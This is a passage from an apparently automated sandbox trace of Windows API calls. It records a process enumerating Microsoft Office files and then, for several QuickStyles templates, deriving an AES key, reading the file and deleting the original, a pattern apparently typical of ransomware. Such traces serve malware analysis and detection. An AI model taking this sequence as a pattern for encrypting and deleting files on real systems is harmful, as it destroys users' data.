returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OCCMPVRD.XML", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCCMPVRD.XML", lpUsedDefaultChar=0x0) returned 13 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OCMODVRD.XML", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCMODVRD.XML", lpUsedDefaultChar=0x0) returned 13 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OFFOWCI.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFOWCI.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OIS.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIS.HXS", lpUsedDefaultChar=0x0) returned 8 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OISINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OISINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OIS_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIS_COL.HXC", lpUsedDefaultChar=0x0) returned 12 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OIS_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIS_COL.HXT", lpUsedDefaultChar=0x0) returned 12 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OIS_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIS_F_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OIS_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIS_K_COL.HXK", lpUsedDefaultChar=0x0) returned 14 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL.IDX_DLL", lpUsedDefaultChar=0x0) returned 20 [0161.287] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONELEV.EXE", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONELEV.EXE", lpUsedDefaultChar=0x0) returned 11 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONENOTE.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.HXS", lpUsedDefaultChar=0x0) returned 12 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OneNoteSyncPCIntl.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteSyncPCIntl.dll", lpUsedDefaultChar=0x0) returned 22 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXC", lpUsedDefaultChar=0x0) returned 16 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXT", lpUsedDefaultChar=0x0) returned 16 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONENOTE_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONENOTE_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONGuide.onepkg", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONGuide.onepkg", lpUsedDefaultChar=0x0) returned 15 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL.IDX_DLL", lpUsedDefaultChar=0x0) returned 19 [0161.291] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ONINTL.REST.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.REST.IDX_DLL", lpUsedDefaultChar=0x0) returned 20 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ORGCH.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCH.VRD", lpUsedDefaultChar=0x0) returned 10 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ORGCHART.VSL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.VSL", lpUsedDefaultChar=0x0) returned 13 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ORGPOS.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGPOS.VRD", lpUsedDefaultChar=0x0) returned 11 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ORGWIZ.VSL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGWIZ.VSL", lpUsedDefaultChar=0x0) returned 11 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ospintl.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ospintl.dll", lpUsedDefaultChar=0x0) returned 12 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTFORM.DAT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTFORM.DAT", lpUsedDefaultChar=0x0) returned 12 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTLBAR.INF", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLBAR.INF", lpUsedDefaultChar=0x0) returned 12 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL", lpUsedDefaultChar=0x0) returned 13 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL.IDX_DLL", lpUsedDefaultChar=0x0) returned 21 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.REST.IDX_DLL", lpUsedDefaultChar=0x0) returned 22 [0161.292] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OUTLOOK.DEV.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.DEV.HXS", lpUsedDefaultChar=0x0) returned 16 [0161.308] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.320] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.337] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.337] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.338] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.338] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.338] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.338] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2387 [0161.338] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.350] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.350] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.350] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Classic.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\classic.dotx")) returned 1 [0161.352] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.353] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.353] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.353] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.353] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23e0 [0161.353] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.360] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.360] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.360] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.361] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Default.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\default.dotx")) returned 1 [0161.363] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.363] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.363] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.363] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.364] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20f5 [0161.364] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.376] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.376] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.376] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\DefaultBlackAndWhite.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\defaultblackandwhite.dotx")) returned 1 [0161.378] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.379] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.379] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.379] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.379] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2169 [0161.379] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.388] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.388] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.388] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.389] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Distinctive.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\distinctive.dotx")) returned 1 [0161.391] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.392] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.392] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.392] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.392] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x222a [0161.392] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.416] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.416] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.416] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Elegant.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\elegant.dotx")) returned 1 [0161.419] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.420] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.420] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.420] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.420] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x221b [0161.420] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.443] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.443] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.443] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Fancy.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\fancy.dotx")) returned 1 [0161.446] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.446] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.446] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.446] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.446] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2168 [0161.446] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.470] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.470] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.471] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Formal.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\formal.dotx")) returned 1 [0161.473] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.474] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.474] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.474] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.474] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x210c [0161.474] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.495] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.495] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.495] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Manuscript.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\manuscript.dotx")) returned 1 [0161.498] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.499] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.499] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.499] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.499] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: 